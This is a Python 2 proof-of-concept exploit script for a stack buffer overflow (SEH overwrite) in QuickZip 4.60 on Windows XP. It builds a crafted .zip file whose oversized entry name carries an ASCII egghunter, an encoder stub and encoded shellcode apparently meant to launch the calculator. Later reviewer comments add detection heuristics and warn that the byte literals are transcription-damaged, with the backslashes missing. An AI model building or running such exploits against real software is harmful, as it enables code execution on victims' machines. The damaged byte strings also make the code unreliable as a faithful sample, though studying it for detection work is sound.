
# Title : QuickZip 4.x (.zip) 0day Local Universal Buffer Overflow PoC Exploit
# Published : 2010-03-08
# Author : corelanc0d3r and mr_me


#!/usr/bin/python
#
# ###############################################################################
# Exploit Title : QuickZip 4.x (.zip) 0day Local Universal Buffer Overflow PoC Exploit
# Date          : 9/3/2010
# Author        : corelanc0d3r & mr_me
# Bug found by  : corelanc0d3r (http://corelan.be:8800/)
# Software Link : http://www.quickzip.org/downloads.html
# Version       : 4.60
# OS            : Windows
# Tested on     : XP SP3 En
# Type of vuln  : SEH
# Greetz to     : Corelan Security Team
# http://www.corelan.be:8800/index.php/security/corelan-team-members/
# ###############################################################################
# Script provided 'as is', without any warranty.
# Use for educational purposes only.
# Do not use this code to do anything illegal !
#
# Note : you are not allowed to edit/modify this code.  
# If you do, Corelan cannot be held responsible for any damages this may cause.
#
# how does this work?
# http://www.offensive-security.com/blog/vulndev/quickzip-stack-bof-0day-a-box-of-chocolates/

# Python 2 script (print statements, text-mode file write).  It writes a single
# malformed .zip to disk; nothing is sent anywhere and nothing is executed by
# the script itself.
#
# Reviewer summary (defender's view): the archive has one entry whose name is
# 4068 bytes long (4064 filler bytes plus ".txt", see the padding expressions
# below), and the headers carry that length as the bytes e4 0f (0x0fe4).  An
# entry-name length in the thousands is a cheap, reliable scanner heuristic,
# and the file is a usable regression fixture for any parser that copies entry
# names into a fixed-size buffer.
#
# NOTE(review): the string literals in this archived copy look transcription-
# damaged (no backslashes survive), so the bytes this copy actually emits may
# not match what the comments in the original header describe.  Verify against
# a pristine sample before deriving byte-offset signatures from it.

# Banner.
print "|------------------------------------------------------------------|"
print "|                         __               __                      |"
print "|   _________  ________  / /___ _____     / /____  ____ _____ ___  |"
print "|  / ___/ __ / ___/ _ / / __ `/ __    / __/ _ / __ `/ __ `__  |"
print "| / /__/ /_/ / /  /  __/ / /_/ / / / /  / /_/  __/ /_/ / / / / / / |"
print "| ___/____/_/   ___/_/__,_/_/ /_/   __/___/__,_/_/ /_/ /_/  |"
print "|                                                                  |"
print "|                                       http://www.corelan.be:8800 |"
print "|                                              security@corelan.be |"
print "|                                                                  |"
print "|-------------------------------------------------[ EIP Hunters ]--|"
print "[+] QuickZip 4.x (.zip) 0day Local Universal Buffer Overflow PoC Exploit"

# ZIP container framing, emitted as three fragments around the crafted name.
# Intended as the local file header ("PK\x03\x04", 30 bytes).  As transcribed
# the e4 0f pair does not line up with the standard name-length position, so
# either this copy is lossy or the local header is deliberately off; do not
# trust its field offsets without checking an original sample.
header_1 = ("x50x4Bx03x04x14x00x00x00x00x00xB7xACxCEx34x00x00x00"
"x00x00x00x00x00x00x00x00xe4x0fx00x00x00")

# Intended as the central directory entry ("PK\x01\x02", 46 bytes); here the
# e4 0f (0x0fe4 = 4068) lands in the name-length field, followed by zero-length
# extra/comment fields, internal attr 0x0001, external attr 0x24 and a local
# header offset of 0.
header_2 = ("x50x4Bx01x02x14x00x14x00x00x00x00x00xB7xACxCEx34x00x00x00"
"x00x00x00x00x00x00x00x00x00xe4x0fx00x00x00x00x00x00x01x00"
"x24x00x00x00x00x00x00x00")

# Intended as the end-of-central-directory record ("PK\x05\x06", 22 bytes):
# one entry; central directory size 0x1012 (4114 = 46 + 4068) at offset 0x1002
# (4098 = 30 + 4068).  These two numbers are internally consistent with a
# 4068-byte name, which is a good cross-check for a detection rule.
header_3 = ("x50x4Bx05x06x00x00x00x00x01x00x01x00"
"x12x10x00x00x02x10x00x00x00x00")

# Printable-ASCII-only egghunter stage (credited to skylined).  Presumably it
# scans for the "W00TW00T" marker placed in front of `calc` below — the stage
# is encoded, so that cannot be confirmed from this listing.
# pure ascii egghunter, thanks to skylined
egghunter= ("JJJJJJJJJJJJJJJJJ7RYjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIQvK1"
"9ZKO6orbv2bJgr2xZmtnulfePZPthoOHbwFPtpbtLKkJLo1eJJloPuKW9okWA");

# Final stage; the name suggests a calculator-launching demo payload, but it is
# encoded and not verifiable here.  It is the part a sandbox would observe
# (process creation) if the PoC fires.
calc = ("xd9xf7xd9x74x24xf4x5bx53x59x49x49x49x49x49x49"
"x49x49x49x43x43x43x43x43x43x43x37x51x5ax6ax41"
"x58x50x30x41x30x41x6bx41x41x51x32x41x42x32x42"
"x42x30x42x42x41x42x58x50x38x41x42x75x4ax49x4b"
"x4cx4ax48x51x54x45x50x43x30x45x50x4cx4bx51x55"
"x47x4cx4cx4bx43x4cx43x35x43x48x43x31x4ax4fx4c"
"x4bx50x4fx44x58x4cx4bx51x4fx47x50x45x51x4ax4b"
"x50x49x4cx4bx46x54x4cx4bx43x31x4ax4ex50x31x49"
"x50x4ax39x4ex4cx4bx34x49x50x42x54x44x47x49x51"
"x49x5ax44x4dx45x51x49x52x4ax4bx4bx44x47x4bx50"
"x54x47x54x45x54x44x35x4dx35x4cx4bx51x4fx51x34"
"x43x31x4ax4bx42x46x4cx4bx44x4cx50x4bx4cx4bx51"
"x4fx45x4cx43x31x4ax4bx4cx4bx45x4cx4cx4bx43x31"
"x4ax4bx4cx49x51x4cx46x44x43x34x48x43x51x4fx50"
"x31x4ax56x43x50x50x56x42x44x4cx4bx50x46x50x30"
"x4cx4bx47x30x44x4cx4cx4bx42x50x45x4cx4ex4dx4c"
"x4bx42x48x45x58x4bx39x4ax58x4bx33x49x50x42x4a"
"x50x50x42x48x4cx30x4cx4ax44x44x51x4fx45x38x4a"
"x38x4bx4ex4dx5ax44x4ex46x37x4bx4fx4dx37x42x43"
"x45x31x42x4cx43x53x46x4ex43x55x43x48x45x35x45"
"x50x41x41");

# Small encoder stub; every byte value used here is in the printable ASCII
# range, which is why it survives wherever the entry name is stored.
# custom encoder
encoder = ("x25x4Ax4Dx4Ex55"   
"x25x35x32x31x2A"			
"x2dx55x55x55x5f"			
"x2dx56x55x56x5f"			
"x2dx55x55x55x5e"			
"x50" 							
"x25x4Ax4Dx4Ex55"   
"x25x35x32x31x2A" 			
"x2dx2bx6ax32x53"			
"x2dx2ax6ax31x54"			
"x2dx2ax69x31x54"			
"x50"							
);

print "[+] Building PoC.."

# The crafted entry name.  Each `N - len(lol)` pad fixes the next piece at an
# absolute offset (223, 294, 4064), so the layout is offset-sensitive; the
# "W00TW00T" marker sits directly in front of `calc`.  Total length is
# 4064 + len(".txt") = 4068, the 0x0fe4 carried in the headers above.
lol = "x43" * 20
lol += egghunter 
lol += "x41" * (223-len(lol))
lol += "x61"
lol += "x53"
lol += "x5c"
lol += encoder
lol += "x41" * (294-len(lol))
lol += "x73xf9x41x41"
lol += "x5cx53x46x00"
lol += "W00TW00T"
lol += calc
lol += "x42" * (4064-len(lol))
lol += ".txt"

# Assemble the archive: local header + name, central directory entry + name,
# end-of-central-directory record.
exploit = header_1 + lol + header_2 + lol + header_3

# Written in text mode ('w') to cst.zip in the current working directory.
mefile = open('cst.zip','w');
mefile.write(exploit);
mefile.close()
print "[+] Exploit complete!"